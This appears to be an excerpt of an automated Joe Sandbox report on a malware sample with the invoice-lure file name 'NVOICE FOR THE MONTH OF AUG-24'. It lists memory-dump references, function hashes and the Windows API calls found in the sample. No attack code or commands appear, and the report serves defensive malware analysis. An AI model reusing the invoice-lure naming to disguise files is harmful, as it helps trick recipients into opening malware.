                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$Copy$ClearErrorLast
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 2487901850-572801152
                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                          APIs
                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Enable$Show$MessageSend
                                                          • String ID:
                                                          • API String ID: 1871949834-0
                                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                          APIs
                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                          • SendMessageW.USER32 ref: 00471AE3
                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                          • String ID:
                                                          • API String ID: 3611059338-0
                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                          • String ID:
                                                          • API String ID: 1640429340-0
                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                          APIs
                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                          • _wcslen.LIBCMT ref: 004438CD
                                                          • _wcslen.LIBCMT ref: 004438E6
                                                          • _wcstok.LIBCMT ref: 004438F8
                                                          • _wcslen.LIBCMT ref: 0044390C
                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                          • _wcstok.LIBCMT ref: 00443931
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                          • String ID:
                                                          • API String ID: 3632110297-0
                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                          • String ID:
                                                          • API String ID: 752480666-0
                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                          • String ID:
                                                          • API String ID: 3275902921-0
                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                          • String ID:
                                                          • API String ID: 3275902921-0
                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                          APIs
                                                          • SendMessageW.USER32 ref: 004555C7
                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                          • String ID:
                                                          • API String ID: 3691411573-0
                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                          APIs
                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                          • EndPath.GDI32(?), ref: 004472D6
                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                          • String ID:
                                                          • API String ID: 372113273-0
                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                          APIs
                                                          • __getptd.LIBCMT ref: 0041708E
                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                          • __lock.LIBCMT ref: 004170BE
                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                          • _free.LIBCMT ref: 004170EE
                                                          • InterlockedIncrement.KERNEL32(02F42D00), ref: 00417106
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                          • String ID:
                                                          • API String ID: 3470314060-0
                                                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
